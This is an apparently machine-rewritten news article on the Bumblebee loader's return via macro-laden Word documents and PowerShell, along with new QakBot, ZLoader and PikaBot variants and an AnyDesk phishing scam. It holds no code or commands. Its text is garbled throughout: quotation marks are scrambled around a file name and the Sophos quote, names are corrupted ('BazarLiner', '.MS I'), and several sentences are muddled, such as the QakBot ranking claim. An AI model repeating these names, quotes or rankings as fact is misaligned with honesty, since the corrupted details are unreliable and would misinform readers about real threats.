As part of a new phishing campaign that was noticed in February 2024, the notorious malware loader and initial access broker Bumblebee has returned after being missing for four months.
According to enterprise security company Proofpoint, the activity uses voicemail-themed lures with OneDrive URL links to target American businesses.
” ReleaseEvans#96″ was one of the Word files that the URLs led to. Docm” ( the digits prior to the file extension varied” ),” according to a report released by the company on Tuesday. The consumer electronics company Humane was spoofed by the Word document.
The Bumblebee loader is retrieved and run when the document is opened using VBA macros, which are then used to launch a PowerShell command and download and execute another powershell script.
The main purpose of Bumblebee, which was first discovered in March 2022, is to download and use follow-up payloads like ransomware. Numerous crimeware threat actors who had previously seen delivering BazaLoader ( also known as BazarLiner ) and IcedID have used it.
As a replacement for BazarLoader, it is also thought to have been created by the cybercrime syndicates Conti and TrickBot. A Bumblebee distribution campaign using Web Distributed Authoring and Versioning ( WebDAV ) servers to distribute the loader was revealed by Intel 471 in September 2023.
Given that Microsoft started by default blocking macros in Office files downloaded from the internet starting in July 2022, the attack chain is notable for its reliance on macro-enabled documents. This has led threat actors to change and diversify their strategies.
The macro-based attack differs significantly from pre-hiatus campaigns that used HTML smuggling to drop a RAR file and took advantage of the WinRAR flaw known as CVE-2023-38831 to install the loader. These campaigns also included zipped LNK files containing Bumblebee executables or HTML attachments.
Bumblebee’s return coincides with the resurgence of new QakBot, ZLoader, and PikaBot iterations, as well as their distribution as Microsoft Software Installer ( MSI) file samples.
According to cybersecurity company Sophos on Mastodon,” The .MS I drops a Windows.cab ( Cabinet ) archive, which is in turn contained by the DLL.” ” Using shellcode, The .MS I extracts the DLL from the.cab and runs it.” The DLL creates a second copy of itself and inserts the shellcode into the memory space of the second instance.
The most recent QakBot artifacts, which use the crypter malware DaveCrypter to harden the encryption used to hide strings and other information, make analysis more difficult. Additionally, the ability to identify whether malware was active inside a virtual machine or sandbox has been restored by the new generation.
Another significant change is the use of AES-256, a more robust technique than was used in earlier versions before QakBot’s infrastructure was demolished in late August 2023, to encrypt all communications between the malware and the command-and-control ( C2 ) server.
According to Andrew Brandt, principal researcher at Sophos X-Ops,” The destruction of the QakBot botnet infrastructure was a victory, but the bot’s creators are still free, and someone with access to the original source code has been testing the waters with these most recent variants.”
The attackers are also restoring previously deprecated features, such as virtual machine (VM ) awareness, and testing them out in these new versions. This is one of the most notable changes. The bot uses a different encryption algorithm to hide default configurations hardcoded into the bot, making it harder for analysts to understand how the malware operates.
In addition to FakeUpdates ( also known as SocGholish ), QakBot has surpassed other malware families like Formbook, Nanocore, AsyncRAT, Remcos Rat, and Agent Tesla as the second most common malware for January 2024.
The development comes as Malwarebytes unveiled a new campaign in which phishing websites imitating financial institutions like Barclays trick potential customers into downloading legitimate remote desktop software like AnyDesk in an effort to purportly fix problems that never materialized and ultimately give threat actors access to the computer.